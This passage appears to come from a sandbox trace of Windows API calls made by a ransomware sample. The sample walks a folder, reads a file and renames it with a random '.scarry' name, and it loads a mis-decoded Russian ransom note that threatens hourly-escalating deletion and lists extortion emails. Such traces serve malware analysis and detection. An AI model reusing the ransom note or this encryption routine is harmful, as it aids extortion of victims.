lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", cchWideChar=68, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXEñ", lpUsedDefaultChar=0x0) returned 68 [0105.184] CharLowerBuffW (in: lpsz=".EXE", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exeShared\\EQUATION\\EQNEDT32.EXEñ", lpUsedDefaultChar=0x0) returned 4 [0105.184] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0105.184] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0105.184] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0105.184] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.184] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.185] GlobalUnlock (hMem=0x45000c) returned 0 [0105.185] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.185] GlobalLock (hMem=0x450004) returned 0x593998 [0105.185] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.185] GlobalUnlock (hMem=0x45000c) returned 0 [0105.185] GlobalHandle (pMem=0x593998) returned 0x450004 [0105.185] GlobalUnlock (hMem=0x450004) returned 0 [0105.185] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0105.185] CharLowerBuffW (in: lpsz="eqnedt32.exe.manifest", cchLength=0x15 | out: lpsz="eqnedt32.exe.manifest") returned 0x15 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", cchWideChar=77, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpUsedDefaultChar=0x0) returned 77 [0105.186] CharLowerBuffW (in: lpsz=".manifest", cchLength=0x9 | out: lpsz=".manifest") returned 0x9 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".manifest", cchWideChar=9, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".manifestd\\EQUATION\\eqnedt32.exe.manifest", lpUsedDefaultChar=0x0) returned 9 [0105.187] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 0x58b060 [0105.187] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0105.187] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0105.187] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0105.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", dwFileAttributes=0x20) returned 1 [0105.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.293] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.293] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x236 [0105.293] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.293] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f28, nNumberOfBytesToRead=0x236, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesRead=0x18ea34*=0x236, lpOverlapped=0x0) returned 1 [0105.294] GlobalLock (hMem=0x450004) returned 0x591988 [0105.294] GlobalLock (hMem=0x45000c) returned 0x593998 [0105.294] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.294] GlobalUnlock (hMem=0x450004) returned 0 [0105.294] GlobalHandle (pMem=0x593998) returned 0x45000c [0105.294] GlobalUnlock (hMem=0x45000c) returned 0 [0105.294] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.294] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.294] GlobalUnlock (hMem=0x45000c) returned 0 [0108.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1da7e48, cbMultiByte=63, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry") returned 63 [0108.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\cr5rdwmwhs8mynvqdu5dcze45mqoec8m6vr8arb=gspurte9bypcgpmo.scarry")) returned 1 [0108.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\cr5rdwmwhs8mynvqdu5dcze45mqoec8m6vr8arb=gspurte9bypcgpmo.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.371] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0108.371] CloseHandle (hObject=0x1a4) returned 1 [0108.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry", dwFileAttributes=0x20) returned 1 [0108.371] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0108.372] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.372] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.372] GlobalUnlock (hMem=0x45000c) returned 0 [0108.372] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.372] GlobalLock (hMem=0x450004) returned 0x593998 [0108.372] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.372] GlobalUnlock (hMem=0x45000c) returned 0 [0108.372] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.372] GlobalUnlock (hMem=0x450004) returned 0 [0108.372] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.372] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.372] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xc00008c8, dwReserved1=0x7ff, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0108.372] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0108.372] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0108.372] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0108.373] CloseHandle (hObject=0x1a4) returned 1 [0108.374] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0108.374] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.374] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.374] GlobalLock (hMem=0x450004) returned 0x591988 [0108.374] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.374] GlobalUnlock (hMem=0x450004) returned 0 [0108.374] GlobalLock (hMem=0x450004) returned 0x591988 [0108.374] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.374] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.374] GlobalUnlock (hMem=0x450004) returned 0 [0108.374] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.374] GlobalUnlock (hMem=0x45000c) returned 0 [0108.374] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.375] CharLowerBuffW (in: lpsz="EQNEDT32.HLP", cchLength=0xc | out: lpsz="eqnedt32.hlp") returned 0xc [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: 